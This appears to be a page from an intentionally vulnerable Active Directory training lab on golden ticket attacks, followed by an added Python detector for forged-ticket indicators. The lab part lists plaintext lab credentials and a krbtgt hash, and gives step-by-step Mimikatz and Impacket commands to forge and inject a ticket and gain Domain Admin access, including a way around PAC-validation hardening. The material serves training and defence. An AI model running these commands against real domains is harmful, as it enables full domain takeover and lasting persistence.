🏛️ Pracivo Advanced AD Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Advanced AD attack techniques beyond Kerberoasting. Includes AS-REP Roasting, DCSync, Golden Tickets, and BloodHound.
Lab Credentials: ram / pracivo  |  john.smith / Welcome1  |  administrator / Admin@2024

Golden Ticket Attack

PERSISTENCE

With the NTLM hash of the krbtgt account you can forge Kerberos TGTs for any user, including names that do not exist in the domain, because the KDC trusts anything encrypted and signed under the krbtgt key. A golden ticket survives password changes on the impersonated account, since that account's key plays no part in the ticket. The only fix is resetting the krbtgt password TWICE, waiting for replication between the two resets: the KDC still accepts tickets encrypted under the previous krbtgt key, so a single reset leaves forged tickets valid. Caveat for patched labs: domain controllers that enforce PAC requestor validation (the KB5008380 hardening) reject a TGT whose user name does not match the account owning the PAC's SID, so on such DCs forge the ticket for a real account name and its real RID (for example /user:administrator /id:500) rather than a made-up user.

# Requirements:
# - krbtgt NTLM hash (from DCSync)
# - Domain SID (S-1-5-21-<x>-<y>-<z>, without a trailing RID)

# Step 1: Get domain SID
Get-ADDomain | Select-Object DomainSID
# or: whoami /user  (your SID is <domain SID>-<RID>; drop the last "-<number>", e.g.
#     S-1-5-21-1111-2222-3333-1105 -> S-1-5-21-1111-2222-3333)

# Step 2: Forge golden ticket with Mimikatz
kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-XXXXXXXXX /krbtgt:9ce232a9f9b77c3947693e7ebd107823 /id:500
# /id:500 puts the built-in Administrator RID in the PAC; the default groups
# (513,512,520,518,519) include Domain Admins and Enterprise Admins.
# Writes ticket.kirbi in the current directory (use /ticket:<name> to change,
# or add /ptt to inject it immediately and skip Step 3).

# Step 3: Inject ticket into current session
kerberos::ptt ticket.kirbi
# klist should now list a krbtgt/CORP.LOCAL ticket for FakeAdmin

# Step 4: Verify — access DC
dir \\dc01.corp.local\c$
# Use the FQDN: a bare IP or NetBIOS name may fall back to NTLM, which ignores the ticket.
# Full access — as Domain Admin

# With Impacket (Linux):
python3 ticketer.py -nthash 9ce232a9f9b77c3947693e7ebd107823 -domain-sid S-1-5-21-XXXXXXXXX -domain corp.local FakeAdmin
# Writes FakeAdmin.ccache
export KRB5CCNAME=FakeAdmin.ccache
python3 psexec.py -k -no-pass corp.local/FakeAdmin@dc01.corp.local
# -k uses the ccache ticket; the target must be the DC's FQDN (resolvable, or add -dc-ip)
krbtgt NTLM hash (from DCSync): 9ce232a9f9b77c3947693e7ebd107823
This hash lets you forge tickets for ANY identity in the domain, and they stay valid until the krbtgt password has been reset twice.
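The defender's side of the same facts, as an added example that is not part of the lab page: a golden ticket never passes through the KDC's AS exchange, so a service-ticket request (event 4769 on the DC) for it has no matching TGT request (event 4768) behind it, and a forged name like FakeAdmin matches no account at all. The script below runs those two checks over a handful of constructed 4768/4769 events (not real log data) and also implements the "strip the RID" step from Step 1. The account list, event shape, field names and 10-hour window (the default TGT lifetime) are assumptions for the example.

```python
import re
from datetime import datetime, timedelta

# Assumed account list for the lab domain, built from the credentials shown on
# this page. A real check would pull it from AD (Get-ADUser -Filter *).
KNOWN_ACCOUNTS = {"ram", "john.smith", "administrator", "krbtgt"}

# Constructed sample events shaped like the useful fields of DC security events
# 4768 (TGT requested) and 4769 (service ticket requested). Not captured data.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "user": "john.smith",
     "ip": "10.0.0.15", "service": "krbtgt"},
    {"id": 4769, "time": "2024-05-01T09:00:05", "user": "john.smith",
     "ip": "10.0.0.15", "service": "cifs/dc01.corp.local"},
    # Golden ticket for a made-up name: no 4768 from this client, no such account.
    {"id": 4769, "time": "2024-05-01T09:10:00", "user": "FakeAdmin",
     "ip": "10.0.0.99", "service": "cifs/dc01.corp.local"},
    # Golden ticket for a real name: the account exists, but the KDC never issued a TGT.
    {"id": 4769, "time": "2024-05-01T09:11:00", "user": "administrator@CORP.LOCAL",
     "ip": "10.0.0.99", "service": "ldap/dc01.corp.local"},
]

DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")


def domain_sid_from_user_sid(user_sid: str) -> str:
    """Return the domain SID for a user SID (the 'strip the last part' of Step 1).

    whoami /user prints <domain SID>-<RID>; the RID is the final dash-separated
    number. Refuses well-known/builtin SIDs such as S-1-5-32-544, which carry no
    domain part and would give mimikatz a wrong /sid:.
    """
    domain, _, rid = user_sid.rpartition("-")
    if not rid.isdigit() or not DOMAIN_SID_RE.match(domain):
        raise ValueError(f"not a domain-account SID: {user_sid}")
    return domain


def find_golden_ticket_indicators(events, known_accounts, window=timedelta(hours=10)):
    """Flag 4769 events that look like they were served from a forged TGT.

    Two indicators, checked in order so each event yields at most one finding:
      1. the ticket's user name matches no account in the domain;
      2. the account exists, but this DC logged no 4768 for the same user and
         client IP within `window` before the service-ticket request.
    """
    known = {a.lower() for a in known_accounts}
    last_tgt = {}  # (user, client ip) -> time of the most recent 4768 seen
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        user = ev["user"].split("@")[0].lower()  # drop a "@REALM" suffix
        key = (user, ev["ip"])
        if ev["id"] == 4768:
            last_tgt[key] = t
            continue
        if ev["id"] != 4769:
            continue
        if user not in known:
            reason = "service ticket for an account that does not exist"
        elif key not in last_tgt or t - last_tgt[key] > window:
            reason = "service ticket with no TGT issued by this DC in the window"
        else:
            continue
        findings.append({"time": ev["time"], "user": user, "ip": ev["ip"],
                         "service": ev["service"], "reason": reason})
    return findings


if __name__ == "__main__":
    print(domain_sid_from_user_sid("S-1-5-21-1111111111-2222222222-3333333333-1105"))
    for f in find_golden_ticket_indicators(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{f['time']} {f['ip']:<12} {f['user']:<14} {f['service']:<22} {f['reason']}")
```

The second indicator only works when 4768/4769 from every DC in the domain are collected together; a TGT issued by another DC, or one older than the window and renewed (event 4770), otherwise shows up as a false positive. The first indicator is also visible in 4624 logons under a name that resolves to no account, which is why the caveat above about forging real account names matters to the attacker as much as to the defender.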